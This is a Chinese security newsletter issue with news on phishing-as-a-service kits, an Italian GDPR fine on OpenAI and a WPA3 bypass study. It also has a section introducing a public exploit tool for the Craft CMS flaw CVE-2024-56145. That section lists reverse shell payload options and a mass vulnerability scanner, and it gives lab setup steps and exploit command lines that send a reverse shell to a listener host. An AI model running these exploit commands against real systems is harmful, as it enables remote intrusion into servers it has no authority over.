网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
国内外要闻
Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
在网络安全的复杂战场中,近期出现了一个值得关注的动态:名为 Rockstar 2FA 的钓鱼即服务(PhaaS)工具包遭遇变故,意外推动了另一个新生服务 FlowerStorm 的猖獗扩张。
据 Sophos 上周发布的新报告指出,运营 Rockstar 2FA 服务的团体似乎经历了至少部分基础设施的崩溃,与该服务相关的页面已无法访问。“这并非由于执法取缔行动,而是服务后端出现了一些技术故障。” 上月末,Trustwave 首次记录了 Rockstar 2FA,它作为一种 PhaaS 服务,能让不法分子发起钓鱼攻击,窃取微软 365 账户凭据和会话 cookie,绕过多重身份验证(MFA)保护。该服务被评估为 DadSec 钓鱼工具包的更新版本,微软以 Storm - 1575 之名对其追踪,多数钓鱼页面托管于.com、.de、.ru 和.moscow 顶级域名,不过.ru 域名的使用据信已随时间减少。
2024 年 11 月 11 日,Rockstar 2FA 似乎遭遇技术中断,转向中间诱饵页面时引发 Cloudflare 超时错误,伪造登录页面无法加载。虽然尚不清楚中断缘由,但此 PhaaS 工具包留下的空白,致使与 FlowerStorm 相关的钓鱼活动激增。FlowerStorm 至少自 2024 年 6 月起就已活跃,Sophos 称,二者在钓鱼门户页面格式及连接后端服务器窃取凭据的方法上存在相似之处,暗示可能有共同起源,且都滥用 Cloudflare Turnstile 防止页面请求来自机器人。有人怀疑 11 月 11 日的中断,要么代表其中一个团体的战略转向,要么是运营人员变动,抑或是有意拆分两项业务,现阶段尚无确凿证据将二者关联。
使用 FlowerStorm 最频繁的目标国家包括美国、加拿大、英国、澳大利亚、意大利、瑞士、波多黎各、德国、新加坡和印度。Sophos 表示:“受攻击最严重的行业是服务业,尤其聚焦于提供工程、建筑、房地产、法律服务与咨询的公司。” 这些发现再次凸显出一种持续趋势:攻击者即便无需深厚技术专长,也能利用网络犯罪服务和通用工具大规模发动网络攻击,这为网络安全防护敲响了警钟,各方需进一步加强防范与监测,以应对此类不断演变的威胁。
意大利因 ChatGPT 违反 GDPR 数据隐私规定对 OpenAI 罚款 1500 万欧元
在数据隐私备受瞩目的当下,意大利的数据保护机构对 ChatGPT 的开发者 OpenAI 开出了高达 1500 万欧元(约合 1566 万美元)的罚单,原因是这款生成式人工智能应用在处理个人数据方面存在诸多问题。
早在近一年前,意大利数据保护机构(Garante)就发现 ChatGPT 在违反欧盟《通用数据保护条例》(GDPR)的情况下,使用用户信息来训练其服务。该机构指出,OpenAI 未就 2023 年 3 月发生的安全漏洞向其通报,并且在没有充分法律依据的情况下,使用用户的个人信息来训练 ChatGPT。同时,还指责该公司违背了透明度原则以及对用户的相关信息告知义务。
此外,Garante 表示:“OpenAI 也未设立年龄验证机制,这可能会使 13 岁以下儿童面临接触与其发展程度和自我认知不符的不当回应的风险。” 除了罚款,OpenAI 还被要求开展为期六个月的宣传活动,通过广播、电视、报纸以及互联网等渠道,增进公众对 ChatGPT 运作方式的了解。
具体而言,要让公众知晓其为训练模型所收集的数据(包括用户和非用户信息)的性质,以及用户可用来反对、更正或删除这些数据的权利。Garante 补充道:“通过这次宣传活动,ChatGPT 的用户和非用户都必须清楚如何阻止生成式人工智能使用他们的个人数据进行训练,从而切实保障他们在 GDPR 下的权利。”
意大利曾在 2023 年 3 月下旬率先以数据保护担忧为由,对 ChatGPT 实施了临时禁令。近一个月后,在 OpenAI 解决了 Garante 提出的相关问题后,ChatGPT 才恢复访问。OpenAI 在发给美联社的一份声明中称,这一处罚决定并不合理,其打算提起上诉,称该罚款金额几乎是其在意大利那段时期营收的 20 倍。同时,它还表示致力于提供有益且尊重用户隐私权的人工智能。
此次裁决出台之前,欧洲数据保护委员会(EDPB)曾提出一种观点,即非法处理个人数据但在部署前已进行匿名化处理的人工智能模型,并不构成违反 GDPR 的行为。该委员会表示:“如果能够证明人工智能模型后续的运行不涉及个人数据处理,那么 EDPB 认为 GDPR 并不适用。因此,初始处理的非法性不应影响模型后续的运行。”
而且,EDPB 还认为,当控制者在模型匿名化后,对部署阶段收集的个人数据进行后续处理时,GDPR 将适用于这些处理操作。本月早些时候,该委员会还发布了关于以符合 GDPR 的方式处理向非欧洲国家进行数据转移的指南,这些指南将接受公众咨询,截止日期为 2025 年 1 月 27 日,并指出 “第三国当局的判决或决定不能在欧洲自动得到认可或执行。如果一个组织响应第三国当局对个人数据的请求,这种数据流动就构成了转移,GDPR 就会适用。”
WPA3 网络密码遭中间人攻击与社会工程学手段绕过
在网络安全领域,近期研究有了令人担忧的发现:研究人员成功地通过结合中间人(MITM)攻击和社会工程学技术,绕过了 Wi-Fi 保护访问 3(WPA3)协议以获取网络密码。
来自西印度群岛大学的凯尔・查迪、韦恩・古德里奇和科夫卡・汗开展的此项研究,凸显了最新无线安全标准中潜在的漏洞。WPA3 于 2018 年推出,旨在弥补其前身 WPA2 的缺陷,并为 Wi-Fi 网络提供更强的安全性。其关键特性之一是对等同时认证(SAE)协议,旨在使密码能抵御离线字典攻击。
然而,研究人员证明可以利用 WPA3 过渡模式中的弱点,该模式用于与 WPA2 设备向后兼容。通过利用降级攻击,他们能够捕获部分 WPA3 握手信息,然后结合社会工程学技术来恢复网络密码。
攻击方法主要包含三个主要步骤:首先,使用降级攻击捕获握手信息;其次,将用户从原始 WPA3 网络中解除认证;最后,创建一个带有强制门户的 “恶意双胞胎” 接入点以获取密码。研究人员使用树莓派来模拟 WPA3 接入点,并利用 Airgeddon 等开源工具来创建恶意接入点和强制门户。当毫无防备的用户尝试连接到虚假网络时,会被提示输入 Wi-Fi 密码,然后该密码会与捕获的握手信息进行验证。
这项研究引发了对 WPA3 安全性的担忧,尤其是其过渡模式。研究发现,当未实施受保护管理帧(这是许多用户可能未意识到或未启用的设置)时,攻击能够成功。有趣的是,研究人员还发现一些设备无法连接到 WPA3 过渡网络,这与 Wi-Fi 联盟声称的与 WPA2 的向后兼容性相矛盾。
虽然该攻击需要特定条件和用户交互,但它表明了保护无线网络面临的持续挑战。研究人员强调了用户教育以及正确配置 WPA3 网络以减轻此类风险的重要性。网络安全专家呼吁对 WPA3 的漏洞进行进一步调查,并开发更多的防护措施。由于 Wi-Fi 网络对于企业和个人而言都是关键基础设施,确保其安全性至关重要。
这项研究的结果提醒人们,即使是最先进的安全协议也可能容易受到技术漏洞利用和社会工程学巧妙组合的攻击。随着 WPA3 采用率的增加,用户和制造商都必须保持警惕,并实施最佳实践以保护无线网络免受潜在攻击。研究团队计划继续开展工作,探索更多漏洞并开发对策,以增强 WPA3 和未来无线协议的安全性。他们的努力有助于在不断演变的数字安全环境中,网络安全专业人员与潜在攻击者之间持续的对抗。
知识分享
CVE-2024-56145: Craft CMS 漏洞利用工具介绍
一、工具背景与用途
这款工具旨在利用 Craft CMS 中存在的一个漏洞,该漏洞是由 Assetnote 出色的研究团队所发现的。这个漏洞源于对用户提供的模板路径处理不当,使得攻击者能够通过特制的有效载荷实现远程代码执行(RCE)。
二、工具特点
-
自动化 FTP 服务器:具备自动化的 FTP 服务器功能,可用于提供恶意的有效载荷,方便攻击者实施相关攻击行为。
-
多种反向 shell 有效载荷生成:支持生成多种类型(如 bash、nc、mkfifo 等)的反向 shell 有效载荷,使用者可根据具体需求进行选择,增加了攻击手段的灵活性。
-
漏洞检查功能:提供漏洞检查器,能够识别存在此漏洞的易受攻击目标,有助于攻击者筛选合适的攻击对象,也方便安全人员提前排查隐患。
-
多线程支持:支持多线程运行,能够实现更快的扫描速度,在面对大量目标时可以有效提高检测或攻击的效率。
-
易用的 CLI 界面:拥有清晰易用的命令行界面(CLI),操作过程中会给出明确的反馈信息,无论是专业安全人员还是有一定基础的使用者都能较方便地操作该工具。
三、搭建易受攻击的测试环境(设置漏洞测试实验室)
若要设置用于测试目的的 Craft CMS 实例,可按照以下步骤进行操作:
-
首先创建相关目录并进入:
mkdir exploit-craft && \
cd exploit-craft && \
2. 配置 DDEV 项目用于 Craft CMS:
ddev config \
--project-type=craftcms \
--docroot=web \
--create-docroot \
--php-version="8.2" \
--database="mysql:8.0" \
--nodejs-version="20" && \
3. 创建 DDEV 项目:
ddev start -y && \
4. 创建指定版本的 Craft CMS:
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
5. 安装特定的 CMS 版本:
ddev composer require "craftcms/cms:5.5.0" \
--no-scripts \
--no-interaction --with-all-dependencies && \
6. 设置 Craft CMS 的安全密钥:
ddev craft setup/security-key && \
7. 安装 Craft CMS:
ddev craft install/craft \
--username=admin \
--password=password123 \
--email=admin@example.com \
--site-name=Testsite \
--language=en \
--site-url='$DDEV_PRIMARY_URL' && \
8. 为 PHP 启用 register_argc_argv:
mkdir -p.ddev/php/ && \
echo "register_argc_argv = On" >.ddev/php/php.ini && \
ddev restart && \
9. 最后输出提示信息并启动项目:
echo 'Nice, ready to launch!' && \
ddev launch
四、工具使用方法
查看帮助信息:
运行工具时添加 --help
标志,就能查看可用的命令,命令格式如下:
python exploit.py --help
利用命令(Exploit Command):
若要利用某个目标的漏洞,使用以下命令格式:
python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>
各参数含义如下:
-u 或 --url:指定目标 URL,此参数是必需的。
-lh 或 --lhost:用于接收反向 shell 的本地 IP,也是必需参数。
-lp 或 --lport:本地用于监听的端口,同样为必需项。
-fh 或 --ftp-host:FTP 服务器主机地址。
-fp 或 --ftp-port:FTP 服务器端口号。
-px 或 --payload:有效载荷类型(可选 bash、nc、mkfifo 等),默认值为 bash。
例如:
python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash
检查命令(Check Command)
python exploit.py check -u <TARGET_URL> -f <FILE_WITH_URLS> -t <THREADS> -o <OUTPUT_FILE>
各参数含义如下:
-u 或 --url:单个目标 URL。
-f 或 --file:包含多个要扫描的 URL 的文件。
-t 或 --threads:用于扫描的并发线程数量。
-o 或 --output:用于保存结果的输出文件。
例如:
python exploit.py check -f urls.txt -t 10 -o results.txt
最后需要强调的是,应秉持负责任、符合道德的态度来使用这款工具,该工具的代码仓库地址为
https://github.com/Chocapikk/CVE-2024-56145,使用者可前往获取更多详细内容。
相关文章:

网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
国内外要闻 Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析 在网络安全的复杂战场中,近期出现了一个值得关注的动态:名为 Rockstar 2FA 的钓鱼即服务(PhaaS)工具包遭遇变故,意外推动了另一个新生服务 Flo…...

玩转OCR | 探索腾讯云智能结构化识别新境界
📝个人主页🌹:Eternity._ 🌹🌹期待您的关注 🌹🌹 ❀ 玩转OCR 腾讯云智能结构化识别产品介绍服务应用产品特征行业案例总结 腾讯云智能结构化识别 腾讯云智能结构化OCR产品分为基础版与高级版&am…...

idea2024创建JavaWeb项目以及配置Tomcat详解
今天呢,博主的学习进度也是步入了JavaWeb,目前正在逐步杨帆旗航,迎接全新的狂潮海浪。 那么接下来就给大家出一期有关JavaWeb的配置教学,希望能对大家有所帮助,也特别欢迎大家指点不足之处,小生很乐意接受正…...

外连接转AntiJoin的应用场景与限制条件 | OceanBase SQL 查询改写系列
在《SQL 改写系列:外连接转内连接的常见场景与错误》一文中,我们了解到谓词条件可以过滤掉连接结果中的 null 情形的,将外连接转化为内连接的做法是可行的,正如图1中路径(a)所示。此时,敏锐的你或许会进一步思考&#…...

华为实训课笔记 2024 1223-1224
华为实训 12/2312/24 12/23 [Huawei]stp enable --开启STP display stp brief --查询STP MSTID Port Role STP State Protection 实例ID 端口 端口角色 端口状态 是否开启保护[Huawei]display stp vlan xxxx --查询制定vlan的生成树计算结…...

MySQL超详细安装配置教程(亲测有效)
目录 1.下载mysql 2.环境配置 3.安装mysql 4.navicat工具下载与连接 5总结 1.下载mysql mysql下载--MySQL :: 下载 MySQL 社区服务器 下载的时候这里直接逃过就行 我这里的版本是最新的mysql8.0.37 下载完成之后,将压缩包进行解压 这里我建议大…...

MySQL 8.0:explain analyze 分析 SQL 执行过程
介绍 MySQL 8.0.16 引入一个实验特性:explain formattree ,树状的输出执行过程,以及预估成本和预估返 回行数。在 MySQL 8.0.18 又引入了 EXPLAIN ANALYZE,在 formattree 基础上,使用时,会执行 SQL &#…...
信管通低代码信息管理系统应用平台
目前,国家统一要求事业单位的电脑都要进行国产化替代,替代后使用的操作系统都是基于linux的,所有以前在WINDOWS下运行的系统都不能使用了,再者,各单位的软件都很零散,没有统一起来。需要把日常办公相关的软…...

git推送本地仓库到远程(Gitee)
目录 一、注册创建库 二、创建仓库 三、推送本地仓库到远程 1.修改本地仓库用户名和邮箱 2.本地库关联远程仓库 3.拉取远程仓库的文件 4.推送本地库的文件 5.查看远程仓库 四、远程分支查看 1.查看远程分支 2.修改test.txt文件 一、注册创建库 Gitee官网࿱…...

【C++语言】多态
一、多态的概念 多态的概念:通俗来说,就是多种形态,具体点就是去完成某种行为,当不同的对象去完成时会产生出不同的状态。 我们可以举一个例子: 比如买票这种行为,当普通人买票时,是全价买票&am…...
ThinkPHP 吸收了Java Spring框架一些特性
ThinkPHP 吸收了Java Spring框架一些特性,下面介绍如下: 1、controller 控制器层 存放控制器层的文件,用于处理请求和响应 2、model 实体类 存放实体类的文件,用于定义数据模型 3、dao DAO层 存放DAO(数据访问…...

自动控制系统综合与LabVIEW实现
自动控制系统综合是为了优化系统性能,确保其可靠性、稳定性和灵活性。常用方法包括动态性能优化、稳态误差分析、鲁棒性设计等。结合LabVIEW,可以通过图形化编程、高效数据采集与处理来实现系统综合。本文将阐述具体方法,并结合硬件选型提供实…...

记录一个SVR学习
1、为什么使用jupter来做数据预测?而不是传统pycharm编辑器 1、Jupyter Notebook 通过anaconda统一管理环境,可以运行python、R、Sql等数据分析常用语言。 2、做到交互式运行,可以逐步运行代码块,实时查看结果,便于调…...
Java内存区域进一步详解
方法区 方法区属于是 JVM 运行时数据区域的一块逻辑区域,是各个线程共享的内存区域。 《Java 虚拟机规范》只是规定了有方法区这么个概念和它的作用,方法区到底要如何实现那就是虚拟机自己要考虑的事情了。也就是说,在不同的虚拟机实现上&am…...

SpiderFlow平台v0.5.0流程的执行过程
流程执行过程: 1. 流程启动 流程的执行通常从一个 开始节点 开始,该节点是整个爬虫任务的起点。开始节点没有实际的功能作用,主要作用是标记流程的起始。 执行顺序:在执行过程中,系统按照流程中的连接线顺序依次执行…...

利用.NET Upgrade Assitant对项目进行升级
本教程演示如何把WPF程序从 <TargetFrameworkVersion>v4.8</TargetFrameworkVersion>升级到<TargetFramework>net8.0-windows</TargetFramework>. 下载并安装.NET Upgrade Assistant - Visual Studio Marketplace Supported .NET upgrades: .NET Frame…...
JAVA开发Erp时日志报错:SQL 当 IDENTITY_INSERT 设置为 OFF 时,不能为表 ‘***‘ 中的标识列插入显式值
错误提示 ### SQL: INSERT INTO sys_user ( user_id, username, password, status, create_time, update_time ) VALUES ( ?, ?, ?, ?, ?, ? ) ### Cause: com.microsoft.sqlserver.jdbc.SQLServerException: 当 IDENTITY_INSERT 设置为 OFF 时&…...

[计算机网络]ARP协议的故事:小明找小红的奇妙旅程
1.ARP小故事 在一个繁忙的网络世界中,每个设备都有自己的身份标识——MAC地址,就像每个人的身份证号码一样。在这个故事里,我们的主角小明(主机)需要找到小红(目标主机)的MAC地址,才…...
数学竞赛网站:构建互动学习的网络平台
2.1 MYSQL数据库 题目确定了是一个应用程序之后,就开始按部就班的进行设计与分析。本课题是需要数据库作为数据管理工具以及数据载体,从程序功能分析到数据分析,选择合适的关系型数据库是当下所选择的重要环节。关系型数据库可选择余地不多&a…...

IntelliJ IDEA 快捷键大全:提升开发效率的利器
目录 一、基础快捷键 1. 文件操作快捷键 2. 编辑(Editing) 2.1 代码补全与导航 2.2 代码编辑 2.3 代码折叠与展开 3. 查找与替换 4. 调试 5. 版本控制 高级快捷键 重构快捷键:让代码更加优雅 导航快捷键:快速定位代码 …...

多云管理“拦路虎”:深入解析网络互联、身份同步与成本可视化的技术复杂度
一、引言:多云环境的技术复杂性本质 企业采用多云策略已从技术选型升维至生存刚需。当业务系统分散部署在多个云平台时,基础设施的技术债呈现指数级积累。网络连接、身份认证、成本管理这三大核心挑战相互嵌套:跨云网络构建数据…...

Python:操作 Excel 折叠
💖亲爱的技术爱好者们,热烈欢迎来到 Kant2048 的博客!我是 Thomas Kant,很开心能在CSDN上与你们相遇~💖 本博客的精华专栏: 【自动化测试】 【测试经验】 【人工智能】 【Python】 Python 操作 Excel 系列 读取单元格数据按行写入设置行高和列宽自动调整行高和列宽水平…...
可靠性+灵活性:电力载波技术在楼宇自控中的核心价值
可靠性灵活性:电力载波技术在楼宇自控中的核心价值 在智能楼宇的自动化控制中,电力载波技术(PLC)凭借其独特的优势,正成为构建高效、稳定、灵活系统的核心解决方案。它利用现有电力线路传输数据,无需额外布…...

UE5 学习系列(三)创建和移动物体
这篇博客是该系列的第三篇,是在之前两篇博客的基础上展开,主要介绍如何在操作界面中创建和拖动物体,这篇博客跟随的视频链接如下: B 站视频:s03-创建和移动物体 如果你不打算开之前的博客并且对UE5 比较熟的话按照以…...

Cloudflare 从 Nginx 到 Pingora:性能、效率与安全的全面升级
在互联网的快速发展中,高性能、高效率和高安全性的网络服务成为了各大互联网基础设施提供商的核心追求。Cloudflare 作为全球领先的互联网安全和基础设施公司,近期做出了一个重大技术决策:弃用长期使用的 Nginx,转而采用其内部开发…...
高防服务器能够抵御哪些网络攻击呢?
高防服务器作为一种有着高度防御能力的服务器,可以帮助网站应对分布式拒绝服务攻击,有效识别和清理一些恶意的网络流量,为用户提供安全且稳定的网络环境,那么,高防服务器一般都可以抵御哪些网络攻击呢?下面…...

SAP学习笔记 - 开发26 - 前端Fiori开发 OData V2 和 V4 的差异 (Deepseek整理)
上一章用到了V2 的概念,其实 Fiori当中还有 V4,咱们这一章来总结一下 V2 和 V4。 SAP学习笔记 - 开发25 - 前端Fiori开发 Remote OData Service(使用远端Odata服务),代理中间件(ui5-middleware-simpleproxy)-CSDN博客…...
Java + Spring Boot + Mybatis 实现批量插入
在 Java 中使用 Spring Boot 和 MyBatis 实现批量插入可以通过以下步骤完成。这里提供两种常用方法:使用 MyBatis 的 <foreach> 标签和批处理模式(ExecutorType.BATCH)。 方法一:使用 XML 的 <foreach> 标签ÿ…...
【Go语言基础【13】】函数、闭包、方法
文章目录 零、概述一、函数基础1、函数基础概念2、参数传递机制3、返回值特性3.1. 多返回值3.2. 命名返回值3.3. 错误处理 二、函数类型与高阶函数1. 函数类型定义2. 高阶函数(函数作为参数、返回值) 三、匿名函数与闭包1. 匿名函数(Lambda函…...
PAN/FPN
import torch import torch.nn as nn import torch.nn.functional as F import mathclass LowResQueryHighResKVAttention(nn.Module):"""方案 1: 低分辨率特征 (Query) 查询高分辨率特征 (Key, Value).输出分辨率与低分辨率输入相同。"""def __…...